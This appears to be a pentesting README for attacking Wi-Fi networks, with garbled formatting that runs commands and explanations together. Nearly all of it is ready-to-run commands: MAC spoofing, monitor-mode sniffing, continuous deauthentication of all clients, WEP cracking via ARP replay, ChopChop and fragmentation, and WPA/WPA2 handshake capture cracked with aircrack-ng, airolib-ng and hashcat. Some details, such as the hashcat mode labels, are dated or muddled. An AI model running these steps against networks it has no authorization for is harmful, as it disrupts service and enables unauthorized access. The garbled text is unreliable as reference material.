A readme guide helping pentesters test networks
ifconfig hw ethersudo ifconfig <interface> down
sudo ifconfig <interface> hw ether <new-mac-address>
sudo ifconfig <interface> up
Change eth0 to MAC 00:11:22:33:44:55:
sudo ifconfig eth0 down
sudo ifconfig eth0 hw ether 00:11:22:33:44:55
sudo ifconfig eth0 up
⚠️ Notes:
<interface> with your network interface (e.g., wlan0, enp3s0).ifconfig may be deprecated — you can alternatively use:sudo ip link set dev <interface> address <new-mac-address>
wlan0 and check its status:sudo airmon-ng check kill
sudo airmon-ng start wlan0
iwconfig
sudo airmon-ng stop wlan0mon
Here’s how you can use airodump-ng for both targeted sniffing and general sniffing:
sudo airodump-ng --bssid <TARGET_MAC> -c <CHANNEL> -w <OUTPUT_FILE> wlan0mon
Explanation:
--bssid <TARGET_MAC> → target a specific access point.-c <CHANNEL> → lock onto the AP’s channel.-w <OUTPUT_FILE> → write captured packets to a file.wlan0mon → your monitor-mode interface.Example:
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w capture wlan0mon
sudo airodump-ng wlan0mon
-w <filename>.aireplay-ng:sudo aireplay-ng --deauth <NUMBER_OF_PACKETS> -a <TARGET_AP_MAC> -c <CLIENT_MAC> <INTERFACE>
Parameters explained:
--deauth <NUMBER_OF_PACKETS> → number of deauth frames to send (use 0 for continuous).-a <TARGET_AP_MAC> → MAC of the target access point.-c <CLIENT_MAC> → MAC of a specific client (optional, omit to target all clients).<INTERFACE> → your monitor-mode interface (e.g., wlan0mon).a) Deauth a specific client from an AP:
sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
b) Deauth all clients from an AP (broadcast):
sudo aireplay-ng --deauth 0 -a 00:11:22:33:44:55 wlan0mon
0 sends deauth frames continuously until you stop it (Ctrl+C).⚠️ Notes:
wlan0mon).🔑 WEP (Wired Equivalent Privacy) Overview
WEP is an older Wi-Fi encryption standard (IEEE 802.11) designed to provide confidentiality similar to a wired network.
It uses the RC4 stream cipher to encrypt data and a 24-bit Initialization Vector (IV) to ensure different encryption streams.
Key lengths: 64-bit (40-bit key + 24-bit IV) or 128-bit (104-bit key + 24-bit IV).

Here’s the fully corrected, comprehensive WEP cracking workflow, including proper use of packetforge-ng with the XOR file for ChopChop and Fragmentation attacks.
wlan0mon).TARGET_MAC) and channel (CHANNEL).YOUR_MAC).sudo airodump-ng --bssid <TARGET_MAC> -c <CHANNEL> -w capture wlan0mon
sudo aircrack-ng capture-01.cap
sudo aireplay-ng -1 0 -a <TARGET_MAC> -h <YOUR_MAC> wlan0mon
sudo aireplay-ng -3 -b <TARGET_MAC> -h <YOUR_MAC> wlan0mon
sudo aircrack-ng capture-01.cap
sudo aireplay-ng -4 -b <TARGET_MAC> -h <YOUR_MAC> wlan0mon
xorfile.xor) for use in packetforge-ng.sudo packetforge-ng -0 -a <TARGET_MAC> -h <YOUR_MAC> -k 255.255.255.255 -l 255.255.255.255 -y xorfile.xor -w chopchop.cap
sudo aireplay-ng -2 -r chopchop.cap -b <TARGET_MAC> wlan0mon
sudo aircrack-ng capture-01.cap
sudo aireplay-ng -5 -b <TARGET_MAC> -h <YOUR_MAC> wlan0mon
xorfile.xor).sudo packetforge-ng -0 -a <TARGET_MAC> -h <YOUR_MAC> -k 255.255.255.255 -l 255.255.255.255 -y xorfile.xor -w fragment.cap
sudo aireplay-ng -2 -r fragment.cap -b <TARGET_MAC> wlan0mon
sudo aircrack-ng capture-01.cap
They use strong encryption:
Capture the WPA/WPA2 handshake
airodump-ng to capture the 4-way handshake.Offline Dictionary/Brute-force Attack
aircrack-ng, hashcat, John the Ripper.Optional: Deauthentication Attack
aireplay-ng --deauth.
Here’s the complete WPA/WPA2 cracking workflow, including handshake capture, deauthentication, dictionary attack, Airolib-ng with ESSID file and batch mode, and GPU cracking with Hashcat.
wlan0mon)TARGET_MAC) and channel (CHANNEL)/usr/share/wordlists/rockyou.txtsudo airodump-ng -c <CHANNEL> --bssid <TARGET_MAC> -w capture wlan0mon
airodump-ng.sudo aireplay-ng --deauth 5 -a <TARGET_MAC> -c <CLIENT_MAC> wlan0mon
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
echo "<ESSID>" > essid.txt
sudo airolib-ng wpa_db --import passwd /usr/share/wordlists/rockyou.txt
sudo airolib-ng wpa_db --import essid essid.txt
sudo airolib-ng wpa_db --batch
--batch generates the internal tables automatically for fast lookup.sudo aircrack-ng -r wpa_db capture-01.cap
sudo cap2hccapx.bin capture-01.cap capture.hccapx
.hccapx format for Hashcat.hashcat -I
hashcat -m 2500 -d 2 capture.hccapx /usr/share/wordlists/rockyou.txt
-m 2500 → WPA/WPA2 PMKID/handshake-d 2 → select GPU devicecapture.hccapx → handshake file/usr/share/wordlists/rockyou.txt → wordlist